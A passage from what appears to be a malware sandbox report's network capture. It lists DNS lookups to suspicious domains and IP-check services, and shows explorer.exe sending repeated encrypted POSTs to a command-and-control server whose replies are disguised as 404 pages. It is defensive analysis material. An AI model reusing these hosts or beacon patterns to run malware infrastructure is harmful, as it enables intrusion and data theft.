Dec 27, 2023 17:59:30.510636091 CET	192.168.2.4	1.1.1.1	0xb46d	Standard query (0)	iplogger.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2023 17:57:18.796634912 CET	1.1.1.1	192.168.2.4	0x764	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.163.105	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.29.185	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.113.89	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.129.145	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.236.161	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.7.17	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.227.153	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:19.799494028 CET	1.1.1.1	192.168.2.4	0x8e83	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.158	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.611100912 CET	1.1.1.1	192.168.2.4	0x205	No error (0)	chincenterblandwka.pw		172.67.176.11	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.611100912 CET	1.1.1.1	192.168.2.4	0x205	No error (0)	chincenterblandwka.pw		104.21.64.47	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.783015013 CET	1.1.1.1	192.168.2.4	0xba18	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 27, 2023 17:57:37.783015013 CET	1.1.1.1	192.168.2.4	0xba18	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.783015013 CET	1.1.1.1	192.168.2.4	0xba18	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:37.783015013 CET	1.1.1.1	192.168.2.4	0xba18	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:49.324628115 CET	1.1.1.1	192.168.2.4	0x7f9	No error (0)	soupinterestoe.fun		104.21.24.252	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:57:49.324628115 CET	1.1.1.1	192.168.2.4	0x7f9	No error (0)	soupinterestoe.fun		172.67.221.65	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:05.106353045 CET	1.1.1.1	192.168.2.4	0x833e	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:05.788439989 CET	1.1.1.1	192.168.2.4	0xdff5	No error (0)	host-host-file8.com		158.160.130.138	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:21.448194027 CET	1.1.1.1	192.168.2.4	0xbe47	Name error (3)	31.241.2.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 17:58:44.085769892 CET	1.1.1.1	192.168.2.4	0xad3a	No error (0)	oshi.at		194.15.112.248	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:44.085769892 CET	1.1.1.1	192.168.2.4	0xad3a	No error (0)	oshi.at		195.66.210.3	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:44.085769892 CET	1.1.1.1	192.168.2.4	0xad3a	No error (0)	oshi.at		5.253.86.15	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:58:44.085769892 CET	1.1.1.1	192.168.2.4	0xad3a	No error (0)	oshi.at		188.241.120.6	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:59:13.200776100 CET	1.1.1.1	192.168.2.4	0xe5	Name error (3)	31.241.2.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 27, 2023 17:59:25.348292112 CET	1.1.1.1	192.168.2.4	0x6651	Name error (3)	host-file-host6.com	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:59:30.634865999 CET	1.1.1.1	192.168.2.4	0xb46d	No error (0)	iplogger.com		104.21.76.57	A (IP address)	IN (0x0001)	false
Dec 27, 2023 17:59:30.634865999 CET	1.1.1.1	192.168.2.4	0xb46d	No error (0)	iplogger.com		172.67.188.178	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	185.215.113.68	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:18.069983006 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hoydjfxbkxmt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: 185.215.113.68
Dec 27, 2023 17:57:18.070051908 CET	130	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 2b af a2 d5 f3 c9 39 df 28 fc 9d 4a e8 43 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP+9(JCkiDK5;.yvVa}P_u-^kz&)d
Dec 27, 2023 17:57:18.368644953 CET	204	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 0d 0a 04 00 00 00 2d 20 5c 6c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8- \l0
Dec 27, 2023 17:57:18.373322964 CET	288	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://afwhwghcbitjespv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: 185.215.113.68
Dec 27, 2023 17:57:18.373372078 CET	274	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a2 d5 f3 c9 38 df 28 fc fb 3d a0 51 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP(8(=QR]pL5:\'pcJM{++KMA ;)"^S0H')Ckv("FgiMCEzVU1V,s]hROR]VCdtp%z?
Dec 27, 2023 17:57:18.670888901 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 63 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 10 d8 fb df 5e bc 1a e5 bb 26 38 d3 93 5f fe d0 3a d7 a3 3b 4b eb 12 ad 01 7f 9a 0e d5 ba 37 b5 fe f5 6b bb 81 36 99 91 32 fd 7d e0 79 b2 04 06 98 2e c4 b2 9d 5b db 68 8f 6e 9d cf 80 f7 8e d0 77 81 b5 90 9e 2f 80 c9 73 0d a8 ea 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cH>99$J^&8_:;K7k62}y.[hnw/s0
Dec 27, 2023 17:57:22.402895927 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://epteubpfimanf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: 185.215.113.68
Dec 27, 2023 17:57:22.402935028 CET	240	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a2 d5 f3 c9 39 df 28 fc f3 2b b0 57 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP)9(+WtNnoA\|*W;Qg0]X)g"[>WC4$WV??7_L>]u]k(x0wQ5{J8:c#t+7}D;WzXh]9!tS89o`@;
Dec 27, 2023 17:57:22.700146914 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:22.712404966 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybqspqyflivrxn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: 185.215.113.68
Dec 27, 2023 17:57:22.712466955 CET	240	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a3 d5 f3 c9 38 df 28 fc e8 79 83 3f Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP(8(y?Js>{uSw.KC.JytxSOu#ZH+"^qFJ2i0`Z&`!4B"i0!pA%U-\FS_Pg~%(*)U'e?
Dec 27, 2023 17:57:23.009787083 CET	239	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 61 0d 0a 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 87 d5 44 be c4 32 8a a5 31 5b f4 55 a6 1e 2d 0d 0a 30 0d 0a 0d 0a Data Ascii: 2aH>99$JY\p}D21[U-0
Dec 27, 2023 17:57:34.179680109 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sqfpmnpygvxoi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 243 Host: 185.215.113.68
Dec 27, 2023 17:57:34.179766893 CET	243	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 29 af a3 d5 f3 c9 39 df 28 fc 89 6a 96 4b Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP)9(jKa3^Ky}8Ss1w1wMdA/#jClG).wiz0u-yz;u;owxRRznv7wlT/.LAT{[a:8<y7krn;m"
Dec 27, 2023 17:57:34.478312016 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:34.486099005 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ctwgmrcxyywh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: 185.215.113.68
Dec 27, 2023 17:57:34.486148119 CET	149	OUT	Data Raw: 14 6d 67 0e 47 62 62 f3 f8 09 a3 50 01 d5 1a 54 44 fa f2 21 bf 15 13 40 e3 e0 3b d9 83 da c7 9b e5 a8 31 be c3 84 6c a3 7b 06 7d bf 7e e8 57 fc 6a ff 8c 81 33 4c e2 82 3f 1c 62 7f 1f e1 68 05 94 04 50 e7 28 af a0 d5 f3 c9 38 df 28 fc c2 3f f3 64 Data Ascii: mgGbbPTD!@;1l{}~Wj3L?bhP(8(?dFP`w{&lzGkl{\8()J21 i$;(8\%`
Dec 27, 2023 17:57:34.783992052 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:34 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 9e cd ad 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 28 3c ff 91 dd e4 d3 c2 7a 4d 8a a4 75 b4 f3 cf 5f 21 6f 40 51 f8 43 ab 4c cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 11 54 09 11 89 d2 af 2b e4 02 3d 97 24 41 7f fe a1 99 26 7d c6 74 f7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 4f 55 af ca 71 83 e8 b9 5f 45 28 18 ad 48 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff ff 78 97 af a6 7b b2 4d 82 fd 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 b0 90 c0 e8 b1 55 84 3a a6 8d 43 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 8c 70 e1 47 e4 fc 03 53 e2 37 df 87 b4 71 dc 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 41 63 c2 75 6e fd 29 2a e7 d0 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 68 ad 60 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 96 0f 2d 6e 04 93 02 8d e4 24 bf 70 7e 3e 3f 43 1e 99 cb cc 9a f1 a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 3f d6 6a 72 f3 79 9b 1d 50 40 0e 20 2c 36 fc 7a 5c 0a 74 df 70 af 6d 2d c6 e3 51 d2 cd b3 5f 2f 87 ee b7 0f 9a 2e 51 79 60 9d ba 11 05 cc 5a d8 2c bd 4d 6d 2d 39 71 a6 78 48 e6 e6 35 05 63 f0 9f 3f 01 47 46 dd 52 47 a1 ca fa 41 f8 bc 46 27 d5 f4 df 70 1a 7d 06 e5 44 5f 14 f2 2d 7b 5e 08 0b dd 07 f9 09 d9 37 36 2b c4 c2 3c 51 1d e5 91 2b bc b6 9d 62 3e aa a7 79 3d 46 dc e9 c8 40 22 cf 5d f3 72 92 a6 91 a4 8f 42 ac 74 27 2c ee 50 f6 af a7 68 08 43 0d f9 be 2c ce c2 6c 6a 69 75 4d d7 03 e2 79 cb 43 b1 fc 11 17 68 35 d2 2d 0f f1 95 ba 94 14 ad 6e c1 bc cd 7c 79 6a da 0d 54 ff e7 dc 49 8c ff 3e cf 06 ec 23 cc f8 bf 40 bb 39 fe e2 ef a6 64 76 a1 2a 63 fa 2d 55 76 e9 b5 c5 55 ab 32 f8 24 34 a1 eb b5 e0 f7 a1 b9 c2 76 73 1e 40 28 2b aa 0a ee b9 30 21 bb 67 14 7b 5c 1e ed 69 db 63 02 21 5b d6 2f 9a f8 b9 77 6c 69 66 4b 83 2b ea e1 46 a8 5a 12 23 13 34 db 94 c8 4a 0c 4b e6 21 e2 22 f9 f0 16 ee 27 62 e8 a6 da 91 03 e9 a2 a3 a4 6a ba 49 62 3f b1 b1 96 fa d5 5d 18 67 0d b7 ee 7c f6 aa e7 28 29 79 d4 44 0d 6d bb a4 9a 60 05 e4 bd 7f 05 26 0c 8b ad 86 cd 92 8a fb a3 3b 69 5a 75 ba bc f7 5d 17 50 09 c6 16 36 b6 34 34 0f 45 2e 9f 8a 75 23 7a 82 57 8a f7 62 fe f5 b1 ac ad bf 2e aa 8a 88 ce 10 a6 36 d1 e5 e8 9c cb 16 0d f4 77 e7 20 c7 63 16 04 91 8e bb d5 7e e0 04 be d9 45 e2 0d 92 d2 ed 7d 7e af 04 60 67 23 9d 39 a0 f9 cd 50 7e 98 74 1d ac d8 88 b1 40 d6 42 50 7c 48 d1 0b 9e 8e 22 e3 50 64 56 9f 49 56 ab 4c 97 a8 ea 2e 90 a2 dc c3 71 29 51 16 51 bc ea c6 6f 91 9f 2a 63 4e 49 2a 0b Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfI!(<zMu_!o@QCL@3sPu-\T+=$A&}t<KL<Qrk5c@]VOUq_E(HsvaaAJ,x{M+xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:CO!%LQ2u6xQypGS7q@7$lRN9LFtp>cAcun)d!b~(OYD6Hv}h`;]t-n$p~>?C3YF w0+.2p0?jryP@ ,6z\tpm-Q_/.Qy`Z,Mm-9qxH5c?GFRGAF'p}D_-{^76+<Q+b>y=F@"]rBt',PhC,ljiuMyCh5-n\|yjTI>#@9dvc-UvU2$4vs@(+0!g{\ic![/wlifK+FZ#4JK!"'bjIb?]g\|()yDm`&;iZu]P644E.u#zWb.6w c~E}~`g#9P~t@BP\|H"PdVIVL.q)QQocNI
Dec 27, 2023 17:57:34.784008026 CET	1286	IN	Data Raw: 66 8f 35 a1 88 2e 63 fd f9 5a 8c c6 6f 43 82 28 79 4e a5 22 9f 35 89 64 41 5b 70 64 cc 1b 19 b6 08 ff 46 cc a6 bf 1c 38 54 62 f8 38 56 c2 4c f6 4e 5e 4c 5f 52 a6 76 6d cc aa f8 84 64 18 0a 53 40 17 9b 7d 98 5e ce 8f 96 cb 1b 84 5d e4 95 3b 6e 21 Data Ascii: f5.cZoC(yN"5dA[pdF8Tb8VLN^L_RvmdS@}^];n!hj =\ZYE$~AO\|UKZ-K([Me3&&N-lEQL]3~l.=7.TJ;<)p6."\*_cv]!([p%D/~W
Dec 27, 2023 17:57:34.784049034 CET	1286	IN	Data Raw: 17 e8 e6 48 c9 84 d1 a3 c0 c2 cd 7c e7 8c 7b 81 6d 19 4e b8 e7 ea c5 62 7e 39 c5 fe 44 1f 29 a9 76 29 0f 04 79 55 4d 2c ae 39 ff 60 e8 22 bc 54 24 f0 49 33 b6 50 72 11 4f f2 52 02 44 56 04 35 e9 86 6c 29 5c 5f 8b 89 b6 24 3f eb 0a fe f4 f3 8e e8 Data Ascii: H\|{mNb~9D)v)yUM,9`"T$I3PrORDV5l)\_$?D'eSR `3tGNJ_): [+w!Xo`XKw[t/`GeW,^F)zc.m"#Z`$-`rOqxn)\ =^
Dec 27, 2023 17:57:34.784095049 CET	1286	IN	Data Raw: cd 51 53 90 61 73 92 a8 01 bb 70 a1 45 d9 23 83 8c 4f 85 62 8a 96 ca 4e 7f fb 25 82 8c 48 4a 98 90 73 70 ce 1e 6d 1b 32 fc 8f f8 30 85 72 89 a7 89 ce 62 a8 6c eb 66 ee a0 32 3b 93 b5 53 4a bd 3a 61 2b 6d bf 75 e9 5b ae 46 d0 41 08 32 c4 1e a5 79 Data Ascii: QSaspE#ObN%HJspm20rblf2;SJ:a+mu[FA2y0r$?_rz%QxN82-&':"n61M/SRlY~Ae/3'"XV\|c)J2rZrX}#Il}pT@N+xE(
Dec 27, 2023 17:57:34.784178972 CET	1286	IN	Data Raw: 37 04 71 06 aa 63 98 5e 47 f9 9e 5b cd fe 29 55 bc f7 c0 4d 62 27 4e 85 4d af 1a 08 ab 38 3f ac fb c9 b8 f5 a4 66 66 17 6a 81 1e f5 0a f3 ad 41 af 84 e4 45 0f 55 5f a6 ed 2f b4 7b 7d 58 a3 17 3f e7 96 5b 2f 41 68 48 a4 b2 a4 b6 ea 56 04 f6 09 bb Data Ascii: 7qc^G[)UMb'NM8?ffjAEU_/{}X?[/AhHV4?jnQ&o~ L (-"D}<cv\|*'"Ftp=_zur>o&"ispTOw3ryh$&,qIu.
Dec 27, 2023 17:57:36.346112013 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eeknbkqrxvjto.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 172 Host: 185.215.113.68
Dec 27, 2023 17:57:36.651945114 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:36 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 